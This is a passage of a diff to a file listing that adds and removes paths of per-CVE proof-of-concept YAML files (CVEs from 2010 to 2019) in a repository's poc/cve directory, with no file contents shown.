./poc/cve/cve-2010-1659-1774.yaml -./poc/cve/cve-2010-1659.yaml ./poc/cve/cve-2010-1714-1775.yaml ./poc/cve/cve-2010-1714-1776.yaml ./poc/cve/cve-2010-1714-1777.yaml @@ -36501,8 +36485,10 @@ ./poc/cve/cve-2010-1715-1780.yaml ./poc/cve/cve-2010-1715-1781.yaml ./poc/cve/cve-2010-1715-1782.yaml +./poc/cve/cve-2010-1715-1783.yaml ./poc/cve/cve-2010-1715-1784.yaml ./poc/cve/cve-2010-1715-1785.yaml +./poc/cve/cve-2010-1715.yaml ./poc/cve/cve-2010-1717-1786.yaml ./poc/cve/cve-2010-1717-1787.yaml ./poc/cve/cve-2010-1717-1788.yaml @@ -36534,8 +36520,11 @@ ./poc/cve/cve-2010-1858-1813.yaml ./poc/cve/cve-2010-1858-1814.yaml ./poc/cve/cve-2010-1858-1815.yaml +./poc/cve/cve-2010-1858-1816.yaml +./poc/cve/cve-2010-1858.yaml ./poc/cve/cve-2010-1870-1817.yaml ./poc/cve/cve-2010-1870-1818.yaml +./poc/cve/cve-2010-1870-1819.yaml ./poc/cve/cve-2010-1871-1820.yaml ./poc/cve/cve-2010-1873-1821.yaml ./poc/cve/cve-2010-1873-1822.yaml @@ -36545,7 +36534,6 @@ ./poc/cve/cve-2010-1875-1826.yaml ./poc/cve/cve-2010-1875-1827.yaml ./poc/cve/cve-2010-1875-1828.yaml -./poc/cve/cve-2010-1875-1829.yaml ./poc/cve/cve-2010-1878-1830.yaml ./poc/cve/cve-2010-1878-1831.yaml ./poc/cve/cve-2010-1878-1832.yaml @@ -36577,9 +36565,9 @@ ./poc/cve/cve-2010-1956-1858.yaml ./poc/cve/cve-2010-1956-1859.yaml ./poc/cve/cve-2010-1957-1860.yaml +./poc/cve/cve-2010-1957-1861.yaml ./poc/cve/cve-2010-1957-1862.yaml ./poc/cve/cve-2010-1957-1863.yaml -./poc/cve/cve-2010-1977-1864.yaml ./poc/cve/cve-2010-1977-1865.yaml ./poc/cve/cve-2010-1977-1866.yaml ./poc/cve/cve-2010-1977-1867.yaml @@ -36604,7 +36592,6 @@ ./poc/cve/cve-2010-1982-1886.yaml ./poc/cve/cve-2010-1982-1887.yaml ./poc/cve/cve-2010-1982-1888.yaml -./poc/cve/cve-2010-1982.yaml ./poc/cve/cve-2010-1983-1889.yaml ./poc/cve/cve-2010-1983-1890.yaml ./poc/cve/cve-2010-1983-1891.yaml @@ -36630,7 +36617,6 @@ ./poc/cve/cve-2010-2036-1912.yaml ./poc/cve/cve-2010-2036-1913.yaml ./poc/cve/cve-2010-2037-1914.yaml -./poc/cve/cve-2010-2037-1915.yaml ./poc/cve/cve-2010-2037-1916.yaml ./poc/cve/cve-2010-2037-1917.yaml ./poc/cve/cve-2010-2037-1918.yaml @@ -36643,7 +36629,6 @@ ./poc/cve/cve-2010-2050-1925.yaml ./poc/cve/cve-2010-2050-1926.yaml ./poc/cve/cve-2010-2050-1927.yaml -./poc/cve/cve-2010-2122-1928.yaml ./poc/cve/cve-2010-2122-1929.yaml ./poc/cve/cve-2010-2122-1930.yaml ./poc/cve/cve-2010-2122-1931.yaml @@ -36683,6 +36668,7 @@ ./poc/cve/cve-2010-2857-1967.yaml ./poc/cve/cve-2010-2857-1968.yaml ./poc/cve/cve-2010-2861-1969.yaml +./poc/cve/cve-2010-2861-1970.yaml ./poc/cve/cve-2010-2861-1971.yaml ./poc/cve/cve-2010-2861-1972.yaml ./poc/cve/cve-2010-2861-1973.yaml @@ -36695,7 +36681,6 @@ ./poc/cve/cve-2010-2920-1981.yaml ./poc/cve/cve-2010-2920-1982.yaml ./poc/cve/cve-2010-2920-1983.yaml -./poc/cve/cve-2010-2920.yaml ./poc/cve/cve-2010-3203-1984.yaml ./poc/cve/cve-2010-3203-1985.yaml ./poc/cve/cve-2010-3203-1986.yaml @@ -36710,7 +36695,6 @@ ./poc/cve/cve-2010-4231-1994.yaml ./poc/cve/cve-2010-4231-1995.yaml ./poc/cve/cve-2010-4231-1996.yaml -./poc/cve/cve-2010-4239-1997.yaml ./poc/cve/cve-2010-4239-1998.yaml ./poc/cve/cve-2010-4282-1999.yaml ./poc/cve/cve-2010-4282-2000.yaml @@ -36720,10 +36704,12 @@ ./poc/cve/cve-2010-4617-2004.yaml ./poc/cve/cve-2010-4617-2005.yaml ./poc/cve/cve-2010-4617-2006.yaml +./poc/cve/cve-2010-4617.yaml ./poc/cve/cve-2010-4719-2008.yaml ./poc/cve/cve-2010-4719-2009.yaml ./poc/cve/cve-2010-4719-2010.yaml ./poc/cve/cve-2010-4769-2011.yaml +./poc/cve/cve-2010-4769-2012.yaml ./poc/cve/cve-2010-4769-2013.yaml ./poc/cve/cve-2010-4769-2014.yaml ./poc/cve/cve-2010-4769-2015.yaml @@ -36742,11 +36728,12 @@ ./poc/cve/cve-2010-5278-2028.yaml ./poc/cve/cve-2010-5278-2029.yaml ./poc/cve/cve-2010-5278-2030.yaml -./poc/cve/cve-2010-5278.yaml ./poc/cve/cve-2010-5286-2031.yaml ./poc/cve/cve-2010-5286-2032.yaml ./poc/cve/cve-2010-5286-2033.yaml +./poc/cve/cve-2010-5286-2034.yaml ./poc/cve/cve-2010-5286-2035.yaml +./poc/cve/cve-2010-5286.yaml ./poc/cve/cve-2011-0049-2036.yaml ./poc/cve/cve-2011-0049-2037.yaml ./poc/cve/cve-2011-0049-2038.yaml @@ -36755,7 +36742,6 @@ ./poc/cve/cve-2011-1669-2041.yaml ./poc/cve/cve-2011-1669-2042.yaml ./poc/cve/cve-2011-1669-2043.yaml -./poc/cve/cve-2011-1669-2044.yaml ./poc/cve/cve-2011-1669-2045.yaml ./poc/cve/cve-2011-1669-2046.yaml ./poc/cve/cve-2011-2744-2047.yaml @@ -36785,6 +36771,7 @@ ./poc/cve/cve-2011-4618-2071.yaml ./poc/cve/cve-2011-4618-2072.yaml ./poc/cve/cve-2011-4618-2073.yaml +./poc/cve/cve-2011-4618.yaml ./poc/cve/cve-2011-4624-2074.yaml ./poc/cve/cve-2011-4624-2075.yaml ./poc/cve/cve-2011-4624-2076.yaml @@ -36795,14 +36782,17 @@ ./poc/cve/cve-2011-4804-2081.yaml ./poc/cve/cve-2011-4804-2082.yaml ./poc/cve/cve-2011-4804-2083.yaml +./poc/cve/cve-2011-4804-2084.yaml ./poc/cve/cve-2011-4804-2085.yaml ./poc/cve/cve-2011-4804-2086.yaml +./poc/cve/cve-2011-4804.yaml ./poc/cve/cve-2011-4926-2087.yaml ./poc/cve/cve-2011-4926-2088.yaml ./poc/cve/cve-2011-4926-2089.yaml ./poc/cve/cve-2011-4926-2090.yaml ./poc/cve/cve-2011-4926-2091.yaml ./poc/cve/cve-2011-4926-2092.yaml +./poc/cve/cve-2011-4926.yaml ./poc/cve/cve-2011-4969.yaml ./poc/cve/cve-2011-5106-2093.yaml ./poc/cve/cve-2011-5106-2094.yaml @@ -36839,7 +36829,6 @@ ./poc/cve/cve-2011-5265-2123.yaml ./poc/cve/cve-2011-5265-2124.yaml ./poc/cve/cve-2011-5265-2125.yaml -./poc/cve/cve-2011-5265.yaml ./poc/cve/cve-2012-0392-2126.yaml ./poc/cve/cve-2012-0392-2127.yaml ./poc/cve/cve-2012-0392-2128.yaml @@ -36851,6 +36840,7 @@ ./poc/cve/cve-2012-0896-2134.yaml ./poc/cve/cve-2012-0896-2135.yaml ./poc/cve/cve-2012-0896-2136.yaml +./poc/cve/cve-2012-0896.yaml ./poc/cve/cve-2012-0901-2137.yaml ./poc/cve/cve-2012-0901-2138.yaml ./poc/cve/cve-2012-0901-2139.yaml @@ -36894,6 +36884,7 @@ ./poc/cve/cve-2012-2371-2177.yaml ./poc/cve/cve-2012-2371-2178.yaml ./poc/cve/cve-2012-2371-2179.yaml +./poc/cve/cve-2012-2371.yaml ./poc/cve/cve-2012-3153-2180.yaml ./poc/cve/cve-2012-3153-2181.yaml ./poc/cve/cve-2012-3153-2182.yaml @@ -36908,7 +36899,6 @@ ./poc/cve/cve-2012-4253-2191.yaml ./poc/cve/cve-2012-4253-2192.yaml ./poc/cve/cve-2012-4253-2193.yaml -./poc/cve/cve-2012-4253.yaml ./poc/cve/cve-2012-4273-2194.yaml ./poc/cve/cve-2012-4273-2195.yaml ./poc/cve/cve-2012-4273-2196.yaml @@ -36945,6 +36935,7 @@ ./poc/cve/cve-2013-1965-2227.yaml ./poc/cve/cve-2013-1965-2228.yaml ./poc/cve/cve-2013-1965-2229.yaml +./poc/cve/cve-2013-1965-2230.yaml ./poc/cve/cve-2013-1965-2231.yaml ./poc/cve/cve-2013-2248-2232.yaml ./poc/cve/cve-2013-2248-2233.yaml @@ -36994,7 +36985,6 @@ ./poc/cve/cve-2013-5979-2277.yaml ./poc/cve/cve-2013-5979-2278.yaml ./poc/cve/cve-2013-5979-2279.yaml -./poc/cve/cve-2013-5979-2280.yaml ./poc/cve/cve-2013-6281-2281.yaml ./poc/cve/cve-2013-7091-2282.yaml ./poc/cve/cve-2013-7091-2283.yaml @@ -37004,6 +36994,8 @@ ./poc/cve/cve-2013-7240-2287.yaml ./poc/cve/cve-2013-7240-2288.yaml ./poc/cve/cve-2013-7240-2289.yaml +./poc/cve/cve-2013-7240-2290.yaml +./poc/cve/cve-2013-7240.yaml ./poc/cve/cve-2014-10037-2291.yaml ./poc/cve/cve-2014-10037-2292.yaml ./poc/cve/cve-2014-10037-2293.yaml @@ -37022,12 +37014,14 @@ ./poc/cve/cve-2014-2383-2306.yaml ./poc/cve/cve-2014-2383-2307.yaml ./poc/cve/cve-2014-2383-2308.yaml +./poc/cve/cve-2014-2908-2309.yaml ./poc/cve/cve-2014-2908-2310.yaml ./poc/cve/cve-2014-2908-2311.yaml ./poc/cve/cve-2014-2962-2312.yaml ./poc/cve/cve-2014-2962-2313.yaml ./poc/cve/cve-2014-2962-2314.yaml ./poc/cve/cve-2014-2962-2315.yaml +./poc/cve/cve-2014-3120-2316.yaml ./poc/cve/cve-2014-3120-2317.yaml ./poc/cve/cve-2014-3120-2318.yaml ./poc/cve/cve-2014-3120-2319.yaml @@ -37054,6 +37048,7 @@ ./poc/cve/cve-2014-4513-2341.yaml ./poc/cve/cve-2014-4513-2342.yaml ./poc/cve/cve-2014-4513-2343.yaml +./poc/cve/cve-2014-4513-2344.yaml ./poc/cve/cve-2014-4513-2345.yaml ./poc/cve/cve-2014-4535-2346.yaml ./poc/cve/cve-2014-4535-2347.yaml @@ -37095,7 +37090,6 @@ ./poc/cve/cve-2014-4940-2383.yaml ./poc/cve/cve-2014-4940-2384.yaml ./poc/cve/cve-2014-4940-2385.yaml -./poc/cve/cve-2014-4940.yaml ./poc/cve/cve-2014-5111-2386.yaml ./poc/cve/cve-2014-5111-2387.yaml ./poc/cve/cve-2014-5111-2388.yaml @@ -37132,6 +37126,7 @@ ./poc/cve/cve-2014-9094-2420.yaml ./poc/cve/cve-2014-9094-2421.yaml ./poc/cve/cve-2014-9094-2422.yaml +./poc/cve/cve-2014-9094.yaml ./poc/cve/cve-2014-9444-2423.yaml ./poc/cve/cve-2014-9444-2424.yaml ./poc/cve/cve-2014-9444-2425.yaml @@ -37139,13 +37134,13 @@ ./poc/cve/cve-2014-9444-2427.yaml ./poc/cve/cve-2014-9606-2428.yaml ./poc/cve/cve-2014-9606-2429.yaml +./poc/cve/cve-2014-9606-2430.yaml ./poc/cve/cve-2014-9607-2431.yaml ./poc/cve/cve-2014-9607-2432.yaml ./poc/cve/cve-2014-9607-2433.yaml ./poc/cve/cve-2014-9608-2434.yaml ./poc/cve/cve-2014-9608-2435.yaml ./poc/cve/cve-2014-9608-2436.yaml -./poc/cve/cve-2014-9609-2437.yaml ./poc/cve/cve-2014-9609-2438.yaml ./poc/cve/cve-2014-9609-2439.yaml ./poc/cve/cve-2014-9614-2440.yaml @@ -37164,6 +37159,7 @@ ./poc/cve/cve-2015-0554-2454.yaml ./poc/cve/cve-2015-0554-2455.yaml ./poc/cve/cve-2015-0554-2456.yaml +./poc/cve/cve-2015-0554.yaml ./poc/cve/cve-2015-1000012-2457.yaml ./poc/cve/cve-2015-1000012-2458.yaml ./poc/cve/cve-2015-1000012-2459.yaml @@ -37198,7 +37194,6 @@ ./poc/cve/cve-2015-2068-2486.yaml ./poc/cve/cve-2015-2068-2487.yaml ./poc/cve/cve-2015-2068-2488.yaml -./poc/cve/cve-2015-2080-2489.yaml ./poc/cve/cve-2015-2080-2490.yaml ./poc/cve/cve-2015-2080-2491.yaml ./poc/cve/cve-2015-2080-2492.yaml @@ -37206,8 +37201,8 @@ ./poc/cve/cve-2015-2166-2494.yaml ./poc/cve/cve-2015-2166-2495.yaml ./poc/cve/cve-2015-2166-2496.yaml -./poc/cve/cve-2015-2166.yaml ./poc/cve/cve-2015-2794.yaml +./poc/cve/cve-2015-2807-2497.yaml ./poc/cve/cve-2015-2807-2498.yaml ./poc/cve/cve-2015-2807-2499.yaml ./poc/cve/cve-2015-2807-2500.yaml @@ -37236,7 +37231,6 @@ ./poc/cve/cve-2015-4050-2524.yaml ./poc/cve/cve-2015-4050-2525.yaml ./poc/cve/cve-2015-4050-2526.yaml -./poc/cve/cve-2015-4050.yaml ./poc/cve/cve-2015-4414-2527.yaml ./poc/cve/cve-2015-4414-2528.yaml ./poc/cve/cve-2015-4414-2529.yaml @@ -37252,6 +37246,7 @@ ./poc/cve/cve-2015-4666-2539.yaml ./poc/cve/cve-2015-4668-2540.yaml ./poc/cve/cve-2015-4668-2541.yaml +./poc/cve/cve-2015-4694-2542.yaml ./poc/cve/cve-2015-4694-2543.yaml ./poc/cve/cve-2015-4694-2544.yaml ./poc/cve/cve-2015-4694-2545.yaml @@ -37276,6 +37271,7 @@ ./poc/cve/cve-2015-5531-2564.yaml ./poc/cve/cve-2015-5531-2565.yaml ./poc/cve/cve-2015-5531-2566.yaml +./poc/cve/cve-2015-5688-2567.yaml ./poc/cve/cve-2015-5688-2568.yaml ./poc/cve/cve-2015-5688-2569.yaml ./poc/cve/cve-2015-5688-2570.yaml @@ -37311,9 +37307,7 @@ ./poc/cve/cve-2015-7780-2601.yaml ./poc/cve/cve-2015-7780-2602.yaml ./poc/cve/cve-2015-7780-2603.yaml -./poc/cve/cve-2015-7780-2604.yaml ./poc/cve/cve-2015-7823-2605.yaml -./poc/cve/cve-2015-7823-2606.yaml ./poc/cve/cve-2015-7823-2607.yaml ./poc/cve/cve-2015-7823-2608.yaml ./poc/cve/cve-2015-7823-2609.yaml @@ -37362,6 +37356,7 @@ ./poc/cve/cve-2016-1000129-2652.yaml ./poc/cve/cve-2016-1000129-2653.yaml ./poc/cve/cve-2016-1000129-2654.yaml +./poc/cve/cve-2016-1000129-2655.yaml ./poc/cve/cve-2016-1000129-2656.yaml ./poc/cve/cve-2016-1000130-2657.yaml ./poc/cve/cve-2016-1000130-2658.yaml @@ -37370,6 +37365,7 @@ ./poc/cve/cve-2016-1000131-2661.yaml ./poc/cve/cve-2016-1000131-2662.yaml ./poc/cve/cve-2016-1000131-2663.yaml +./poc/cve/cve-2016-1000131-2664.yaml ./poc/cve/cve-2016-1000131-2665.yaml ./poc/cve/cve-2016-1000132-2666.yaml ./poc/cve/cve-2016-1000132-2667.yaml @@ -37421,14 +37417,12 @@ ./poc/cve/cve-2016-1000142-2714.yaml ./poc/cve/cve-2016-1000143-2715.yaml ./poc/cve/cve-2016-1000143-2716.yaml -./poc/cve/cve-2016-1000143-2717.yaml ./poc/cve/cve-2016-1000146-2718.yaml ./poc/cve/cve-2016-1000146-2719.yaml ./poc/cve/cve-2016-1000146-2720.yaml ./poc/cve/cve-2016-1000146-2721.yaml ./poc/cve/cve-2016-1000148-2722.yaml ./poc/cve/cve-2016-1000148-2723.yaml -./poc/cve/cve-2016-1000148-2724.yaml ./poc/cve/cve-2016-1000149-2725.yaml ./poc/cve/cve-2016-1000149-2726.yaml ./poc/cve/cve-2016-1000149-2727.yaml @@ -37496,7 +37490,6 @@ ./poc/cve/cve-2016-3088.yaml ./poc/cve/cve-2016-3978-2789.yaml ./poc/cve/cve-2016-3978-2790.yaml -./poc/cve/cve-2016-4975-2792.yaml ./poc/cve/cve-2016-4975-2793.yaml ./poc/cve/cve-2016-4975-2794.yaml ./poc/cve/cve-2016-4975-2795.yaml @@ -37508,7 +37501,6 @@ ./poc/cve/cve-2016-5649-2801.yaml ./poc/cve/cve-2016-6210-2802.yaml ./poc/cve/cve-2016-6210-2803.yaml -./poc/cve/cve-2016-6210.yaml ./poc/cve/cve-2016-6277-2804.yaml ./poc/cve/cve-2016-6277-2805.yaml ./poc/cve/cve-2016-6277-2806.yaml @@ -37524,7 +37516,6 @@ ./poc/cve/cve-2016-7981-2816.yaml ./poc/cve/cve-2016-8527-2817.yaml ./poc/cve/cve-2016-8527-2818.yaml -./poc/cve/cve-2016-8527-2819.yaml ./poc/cve/cve-2017-0929-2821.yaml ./poc/cve/cve-2017-0929-2822.yaml ./poc/cve/cve-2017-0929-2823.yaml @@ -37576,6 +37567,7 @@ ./poc/cve/cve-2017-11444-2869.yaml ./poc/cve/cve-2017-11512-2870.yaml ./poc/cve/cve-2017-11512-2871.yaml +./poc/cve/cve-2017-11512-2872.yaml ./poc/cve/cve-2017-11610-2873.yaml ./poc/cve/cve-2017-11610-2875.yaml ./poc/cve/cve-2017-12138-2876.yaml @@ -37595,7 +37587,6 @@ ./poc/cve/cve-2017-12544-2890.yaml ./poc/cve/cve-2017-12544-2891.yaml ./poc/cve/cve-2017-12583-2892.yaml -./poc/cve/cve-2017-12583-2893.yaml ./poc/cve/cve-2017-12611-2894.yaml ./poc/cve/cve-2017-12611-2895.yaml ./poc/cve/cve-2017-12611-2896.yaml @@ -37607,6 +37598,7 @@ ./poc/cve/cve-2017-12615-2903.yaml ./poc/cve/cve-2017-12615-2904.yaml ./poc/cve/cve-2017-12615-2905.yaml +./poc/cve/cve-2017-12615.yaml ./poc/cve/cve-2017-12629-2906.yaml ./poc/cve/cve-2017-12629-2907.yaml ./poc/cve/cve-2017-12629-2908.yaml @@ -37689,6 +37681,7 @@ ./poc/cve/cve-2017-18024-2989.yaml ./poc/cve/cve-2017-18024-2990.yaml ./poc/cve/cve-2017-18024-2991.yaml +./poc/cve/cve-2017-18024-2992.yaml ./poc/cve/cve-2017-18536-2993.yaml ./poc/cve/cve-2017-18536-2994.yaml ./poc/cve/cve-2017-18536-2995.yaml @@ -37722,7 +37715,6 @@ ./poc/cve/cve-2017-5487-3024.yaml ./poc/cve/cve-2017-5521-3025.yaml ./poc/cve/cve-2017-5521-3026.yaml -./poc/cve/cve-2017-5521-3027.yaml ./poc/cve/cve-2017-5521-3028.yaml ./poc/cve/cve-2017-5521-3029.yaml ./poc/cve/cve-2017-5631-3030.yaml @@ -37762,6 +37754,7 @@ ./poc/cve/cve-2017-7529-3064.yaml ./poc/cve/cve-2017-7529-3065.yaml ./poc/cve/cve-2017-7529-3066.yaml +./poc/cve/cve-2017-7615-3067.yaml ./poc/cve/cve-2017-7615-3068.yaml ./poc/cve/cve-2017-7615-3069.yaml ./poc/cve/cve-2017-7615-3070.yaml @@ -37771,7 +37764,6 @@ ./poc/cve/cve-2017-8917-3075.yaml ./poc/cve/cve-2017-8917-3076.yaml ./poc/cve/cve-2017-8917-3077.yaml -./poc/cve/cve-2017-8917-3078.yaml ./poc/cve/cve-2017-8917-3079.yaml ./poc/cve/cve-2017-9140-3080.yaml ./poc/cve/cve-2017-9140-3081.yaml @@ -37787,7 +37779,6 @@ ./poc/cve/cve-2017-9506-3091.yaml ./poc/cve/cve-2017-9506-3092.yaml ./poc/cve/cve-2017-9506-3093.yaml -./poc/cve/cve-2017-9506.yaml ./poc/cve/cve-2017-9791-3094.yaml ./poc/cve/cve-2017-9791-3095.yaml ./poc/cve/cve-2017-9791-3096.yaml @@ -37828,6 +37819,7 @@ ./poc/cve/cve-2018-1000129-3131.yaml ./poc/cve/cve-2018-1000129-3132.yaml ./poc/cve/cve-2018-1000129-3133.yaml +./poc/cve/cve-2018-1000129.yaml ./poc/cve/cve-2018-1000130-3134.yaml ./poc/cve/cve-2018-1000130-3135.yaml ./poc/cve/cve-2018-1000130-3136.yaml @@ -37835,7 +37827,6 @@ ./poc/cve/cve-2018-1000226-3138.yaml ./poc/cve/cve-2018-1000226-3139.yaml ./poc/cve/cve-2018-1000226-3140.yaml -./poc/cve/cve-2018-1000533-3141.yaml ./poc/cve/cve-2018-1000533-3142.yaml ./poc/cve/cve-2018-1000533-3143.yaml ./poc/cve/cve-2018-1000600-3144.yaml @@ -37846,6 +37837,7 @@ ./poc/cve/cve-2018-1000861-3149.yaml ./poc/cve/cve-2018-1000861-3150.yaml ./poc/cve/cve-2018-1000861-3151.yaml +./poc/cve/cve-2018-1000861-3152.yaml ./poc/cve/cve-2018-1000861-3153.yaml ./poc/cve/cve-2018-10093-3154.yaml ./poc/cve/cve-2018-10093-3155.yaml @@ -37889,7 +37881,6 @@ ./poc/cve/cve-2018-11409-3193.yaml ./poc/cve/cve-2018-11409-3194.yaml ./poc/cve/cve-2018-11409-3195.yaml -./poc/cve/cve-2018-11409.yaml ./poc/cve/cve-2018-11709-3196.yaml ./poc/cve/cve-2018-11709-3197.yaml ./poc/cve/cve-2018-11709-3198.yaml @@ -37901,7 +37892,6 @@ ./poc/cve/cve-2018-11759-3204.yaml ./poc/cve/cve-2018-11759-3205.yaml ./poc/cve/cve-2018-11759-3206.yaml -./poc/cve/cve-2018-11759.yaml ./poc/cve/cve-2018-11776-3207.yaml ./poc/cve/cve-2018-11776-3208.yaml ./poc/cve/cve-2018-11776-3209.yaml @@ -37951,6 +37941,7 @@ ./poc/cve/cve-2018-12634-3254.yaml ./poc/cve/cve-2018-12634-3255.yaml ./poc/cve/cve-2018-12634.yaml +./poc/cve/cve-2018-12675-3256.yaml ./poc/cve/cve-2018-12675-3257.yaml ./poc/cve/cve-2018-12675-3258.yaml ./poc/cve/cve-2018-1271-3259.yaml @@ -38017,13 +38008,12 @@ ./poc/cve/cve-2018-14918-3322.yaml ./poc/cve/cve-2018-14931-3323.yaml ./poc/cve/cve-2018-14931-3324.yaml +./poc/cve/cve-2018-14931-3325.yaml ./poc/cve/cve-2018-15138-3326.yaml ./poc/cve/cve-2018-15138-3327.yaml ./poc/cve/cve-2018-15138-3328.yaml ./poc/cve/cve-2018-15138-3329.yaml ./poc/cve/cve-2018-15473-3330.yaml -./poc/cve/cve-2018-15473.yaml -./poc/cve/cve-2018-15517-3331.yaml ./poc/cve/cve-2018-15517-3332.yaml ./poc/cve/cve-2018-15517-3333.yaml ./poc/cve/cve-2018-15517-3334.yaml @@ -38048,6 +38038,7 @@ ./poc/cve/cve-2018-16133-3355.yaml ./poc/cve/cve-2018-16133-3356.yaml ./poc/cve/cve-2018-16133-3357.yaml +./poc/cve/cve-2018-16133-3358.yaml ./poc/cve/cve-2018-16167-3359.yaml ./poc/cve/cve-2018-16167-3360.yaml ./poc/cve/cve-2018-16167-3361.yaml @@ -38094,7 +38085,6 @@ ./poc/cve/cve-2018-16763-3402.yaml ./poc/cve/cve-2018-16763-3403.yaml ./poc/cve/cve-2018-16763-3404.yaml -./poc/cve/cve-2018-16763.yaml ./poc/cve/cve-2018-16836-3405.yaml ./poc/cve/cve-2018-16836-3406.yaml ./poc/cve/cve-2018-16836-3407.yaml @@ -38126,7 +38116,6 @@ ./poc/cve/cve-2018-18264-3433.yaml ./poc/cve/cve-2018-18264-3434.yaml ./poc/cve/cve-2018-18264-3435.yaml -./poc/cve/cve-2018-18264.yaml ./poc/cve/cve-2018-18323-3436.yaml ./poc/cve/cve-2018-18323-3437.yaml ./poc/cve/cve-2018-18323-3438.yaml @@ -38136,6 +38125,7 @@ ./poc/cve/cve-2018-18570-3443.yaml ./poc/cve/cve-2018-18570-3444.yaml ./poc/cve/cve-2018-18570-3445.yaml +./poc/cve/cve-2018-18775-3446.yaml ./poc/cve/cve-2018-18775-3447.yaml ./poc/cve/cve-2018-18775-3448.yaml ./poc/cve/cve-2018-18775-3449.yaml @@ -38163,7 +38153,6 @@ ./poc/cve/cve-2018-19386-3471.yaml ./poc/cve/cve-2018-19386-3472.yaml ./poc/cve/cve-2018-19386-3473.yaml -./poc/cve/cve-2018-19386.yaml ./poc/cve/cve-2018-19439-3474.yaml ./poc/cve/cve-2018-19439-3475.yaml ./poc/cve/cve-2018-19439-3476.yaml @@ -38176,11 +38165,11 @@ ./poc/cve/cve-2018-19458-3483.yaml ./poc/cve/cve-2018-19458-3484.yaml ./poc/cve/cve-2018-19458-3485.yaml +./poc/cve/cve-2018-19752(1).yaml ./poc/cve/cve-2018-19753-3486.yaml ./poc/cve/cve-2018-19753-3487.yaml ./poc/cve/cve-2018-19753-3488.yaml ./poc/cve/cve-2018-19877(1).yaml -./poc/cve/cve-2018-20010(1).yaml ./poc/cve/cve-2018-20062-3489.yaml ./poc/cve/cve-2018-20062-3490.yaml ./poc/cve/cve-2018-20062-3491.yaml @@ -38199,7 +38188,7 @@ ./poc/cve/cve-2018-20824-3504.yaml ./poc/cve/cve-2018-20985-3505.yaml ./poc/cve/cve-2018-20985-3506.yaml -./poc/cve/cve-2018-20985-3507.yaml +./poc/cve/cve-2018-2392-3508.yaml ./poc/cve/cve-2018-2392-3509.yaml ./poc/cve/cve-2018-2392-3510.yaml ./poc/cve/cve-2018-2392-3511.yaml @@ -38226,10 +38215,10 @@ ./poc/cve/cve-2018-3167-3534.yaml ./poc/cve/cve-2018-3167-3535.yaml ./poc/cve/cve-2018-3167-3536.yaml -./poc/cve/cve-2018-3167.yaml ./poc/cve/cve-2018-3238-1.yaml ./poc/cve/cve-2018-3238-2.yaml ./poc/cve/cve-2018-3238-3.yaml +./poc/cve/cve-2018-3238-3537.yaml ./poc/cve/cve-2018-3238-3538.yaml ./poc/cve/cve-2018-3238-3539.yaml ./poc/cve/cve-2018-3714-3540.yaml @@ -38266,6 +38255,7 @@ ./poc/cve/cve-2018-6008-3571.yaml ./poc/cve/cve-2018-6008-3572.yaml ./poc/cve/cve-2018-6008-3573.yaml +./poc/cve/cve-2018-6008-3574.yaml ./poc/cve/cve-2018-6008-3575.yaml ./poc/cve/cve-2018-6200-3576.yaml ./poc/cve/cve-2018-6200-3577.yaml @@ -38304,7 +38294,6 @@ ./poc/cve/cve-2018-7600-3610.yaml ./poc/cve/cve-2018-7600-3611.yaml ./poc/cve/cve-2018-7600-3612.yaml -./poc/cve/cve-2018-7602-3613.yaml ./poc/cve/cve-2018-7602-3614.yaml ./poc/cve/cve-2018-7602-3615.yaml ./poc/cve/cve-2018-7662-3616.yaml @@ -38321,6 +38310,7 @@ ./poc/cve/cve-2018-8006-3627.yaml ./poc/cve/cve-2018-8006-3628.yaml ./poc/cve/cve-2018-8006-3629.yaml +./poc/cve/cve-2018-8006-3630.yaml ./poc/cve/cve-2018-8006-3631.yaml ./poc/cve/cve-2018-8033-3632.yaml ./poc/cve/cve-2018-8033-3633.yaml @@ -38343,6 +38333,7 @@ ./poc/cve/cve-2018-9118-3651.yaml ./poc/cve/cve-2018-9118-3652.yaml ./poc/cve/cve-2018-9118-3653.yaml +./poc/cve/cve-2018-9118-3654.yaml ./poc/cve/cve-2018-9126-3655.yaml ./poc/cve/cve-2018-9126-3656.yaml ./poc/cve/cve-2018-9126-3657.yaml @@ -38395,13 +38386,14 @@ ./poc/cve/cve-2019-10232-3705.yaml ./poc/cve/cve-2019-10405-3706.yaml ./poc/cve/cve-2019-10405-3707.yaml +./poc/cve/cve-2019-10405-3708.yaml ./poc/cve/cve-2019-10475-3709.yaml ./poc/cve/cve-2019-10475-3710.yaml ./poc/cve/cve-2019-10475-3711.yaml ./poc/cve/cve-2019-10475-3712.yaml ./poc/cve/cve-2019-10475-3713.yaml ./poc/cve/cve-2019-10475-3714.yaml -./poc/cve/cve-2019-10717(1).yaml +./poc/cve/cve-2019-10758-3715.yaml ./poc/cve/cve-2019-10758-3716.yaml ./poc/cve/cve-2019-10758-3717.yaml ./poc/cve/cve-2019-10758-3718.yaml @@ -38410,7 +38402,6 @@ ./poc/cve/cve-2019-11013-3722.yaml ./poc/cve/cve-2019-11013-3723.yaml ./poc/cve/cve-2019-11013-3724.yaml -./poc/cve/cve-2019-11043-3725.yaml ./poc/cve/cve-2019-11043-3726.yaml ./poc/cve/cve-2019-11043-3727.yaml ./poc/cve/cve-2019-11248-3728.yaml @@ -38429,6 +38420,7 @@ ./poc/cve/cve-2019-11510-3740.yaml ./poc/cve/cve-2019-11510-3741.yaml ./poc/cve/cve-2019-11510-3742.yaml +./poc/cve/cve-2019-11510.yaml ./poc/cve/cve-2019-11580-3743.yaml ./poc/cve/cve-2019-11580-3744.yaml ./poc/cve/cve-2019-11580-3745.yaml @@ -38472,6 +38464,7 @@ ./poc/cve/cve-2019-12461-3782.yaml ./poc/cve/cve-2019-12461-3783.yaml ./poc/cve/cve-2019-12581(1).yaml +./poc/cve/cve-2019-12583(1).yaml ./poc/cve/cve-2019-12583-3784.yaml ./poc/cve/cve-2019-12593-1.yaml ./poc/cve/cve-2019-12593-2.yaml @@ -38491,7 +38484,6 @@ ./poc/cve/cve-2019-12725-3799.yaml ./poc/cve/cve-2019-12725-3800.yaml ./poc/cve/cve-2019-12725-3801.yaml -./poc/cve/cve-2019-12962(1).yaml ./poc/cve/cve-2019-13101-3802.yaml ./poc/cve/cve-2019-13101-3803.yaml ./poc/cve/cve-2019-13101-3804.yaml @@ -38546,7 +38538,6 @@ ./poc/cve/cve-2019-14322-3848.yaml ./poc/cve/cve-2019-14322-3849.yaml ./poc/cve/cve-2019-14322-3850.yaml -./poc/cve/cve-2019-14322.yaml ./poc/cve/cve-2019-14470-3851.yaml ./poc/cve/cve-2019-14470-3852.yaml ./poc/cve/cve-2019-14470-3853.yaml @@ -38569,6 